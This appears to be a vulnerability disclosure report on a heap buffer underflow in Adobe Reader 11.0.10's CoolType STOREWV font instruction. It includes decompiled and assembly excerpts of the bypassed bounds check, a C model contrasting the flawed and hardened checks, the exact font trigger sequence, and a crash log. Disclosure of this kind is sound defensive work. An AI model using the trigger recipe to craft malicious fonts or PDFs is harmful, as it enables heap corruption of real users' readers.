In the Adobe Reader CoolType implementation of the `STOREWV` instruction (othersubr 19) used by Multiple Master Fonts [1], values are copied from a so-called "WeightVector" (an internal, MM-specific array) into the transient array (also known as "BuildCharArray"). The starting index is obtained from the operand stack, as shown below in Hex-Rays decompiled pseudo-code:
---
--op_sp;
idx = *(op_sp + 1);
[...]
master_designs = font->master_designs;
if ( master_designs + idx > font->lenBuildCharArray )
    return -8;
---
or, in assembly:
---
.text:080426B7 movsx ebx, word ptr [esi+2]
[...]
.text:0804270F mov eax, [edi+2B8h]
.text:08042715 lea ecx, [ebx+eax]
.text:08042718 cmp ecx, [edi+360h]
.text:0804271E ja loc_8041FA1 ; jumptable 08041720 cases 0,2
---
The "master_designs" variable is the size of the "WeightVector" array and can be anything from 2 to 16, while "idx" is a fully controlled 16-bit signed integer. Because the sum "master_designs + idx" is compared unsigned (the "ja" above) and "master_designs" is at most 16, any negative "idx" in the range [-master_designs, -1] still produces a sum within bounds and the check is effectively bypassed. The copy loop below then starts in front of the "BuildCharArray" heap-based allocation, a buffer underflow of up to 64 bytes (16 dwords):
---
if ( master_designs )
{
  buildchar_offset = idx;
  weight_vector = font->weight_vector;
  do
  {
    ++it;
    value = *weight_vector;
    weight_vector += 4;
    font->BuildCharArray[buildchar_offset] = value;
    ++buildchar_offset;
  }
  while ( it < font->master_designs );
  op_sp = tmp_op_sp;
  it = 0;
}
---
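The faulty check and a hardened replacement side by side, as an added C model that is not CoolType's code: it reproduces the unsigned comparison from the assembly above, runs the copy loop against a simulated array with guard words in front of it, and counts how many guard words a negative index overwrites (function names, the guard layout and the sample WeightVector values are assumed).

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Model of the STOREWV index check (assumed names, not CoolType's code). Mirrors
 * "lea ecx,[ebx+eax]; cmp ecx,len; ja": sign-extended idx + master_designs, compared unsigned. */
static bool check_original(int16_t idx, uint32_t master_designs, uint32_t len)
{
    uint32_t end = (uint32_t)(int32_t)idx + master_designs; /* wraps when idx < 0 */
    return end <= len;          /* -16 + 16 == 0, so the test passes */
}

/* Hardened check: a negative start index is rejected outright, the upper bound is kept. */
static bool check_fixed(int16_t idx, uint32_t master_designs, uint32_t len)
{
    if (idx < 0 || master_designs > 16)
        return false;
    return (uint32_t)idx + master_designs <= len;
}

/* Simulated heap: GUARD words of "metadata" directly in front of a BuildCharArray of
 * LEN words, in one flat array so a negative index hits the guard words, not UB. */
#define GUARD 16
#define LEN   32
#define MAGIC 0xAAAAAAAAu

/* Run one STOREWV with the chosen check and return how many guard words were
 * overwritten: 0 means the copy was rejected or stayed inside the array. */
static int storewv_guard_damage(int16_t idx, uint32_t master_designs, bool use_fixed)
{
    uint32_t mem[GUARD + LEN], wv[16];
    for (int i = 0; i < GUARD + LEN; i++) mem[i] = i < GUARD ? MAGIC : 0;
    for (int i = 0; i < 16; i++) wv[i] = 0x1000u + (uint32_t)i; /* constructed WeightVector */
    bool ok = use_fixed ? check_fixed(idx, master_designs, LEN)
                        : check_original(idx, master_designs, LEN);
    if (ok)
        for (uint32_t it = 0; it < master_designs; it++)
            mem[GUARD + idx + (int)it] = wv[it];   /* negative idx writes before the array */
    int damaged = 0;
    for (int i = 0; i < GUARD; i++) damaged += mem[i] != MAGIC;
    return damaged;
}

int main(void)
{
    printf("original check, idx=-16: %d guard words hit\n", storewv_guard_damage(-16, 16, false));
    printf("fixed check,    idx=-16: %d guard words hit\n", storewv_guard_damage(-16, 16, true));
}
```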
The vulnerability can be reproduced with Multiple Master Type1 fonts, but also with regular Type1 fonts, provided that a PostScript "/WeightVector" array is present in the font header (preferably of length 16), and the following instruction sequence is used for one of the rendered glyphs:
---
-16 1 19 callother
---
This will overwrite 64 bytes in front of the transient array, corrupting the heap headers and leading to an Adobe Reader crash (the full log can be found in "crash.txt"):
---
(270c.22b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=7281a912 ebx=7281a480 ecx=00010000 edx=017c0000 esi=7281a912 edi=00000000
eip=72804a59 esp=0038ee74 ebp=0038ee88 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
BIB!BIBInitialize4+0x354b:
72804a59 895114 mov dword ptr [ecx+14h],edx ds:002b:00010014=????????
---
Adobe Reader 11.0.10 is confirmed to be affected, but we expect all prior versions of the software to be prone to the bug, too. A Type1 Proof of Concept font is attached ("poc.pfm" + "poc.pfb"), together with its source code to be compiled with the type1 tool ("poc.pfa"), and an actual PDF file with the offending font file embedded.
This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
References:
[1] http://en.wikipedia.org/wiki/Multiple_master_fonts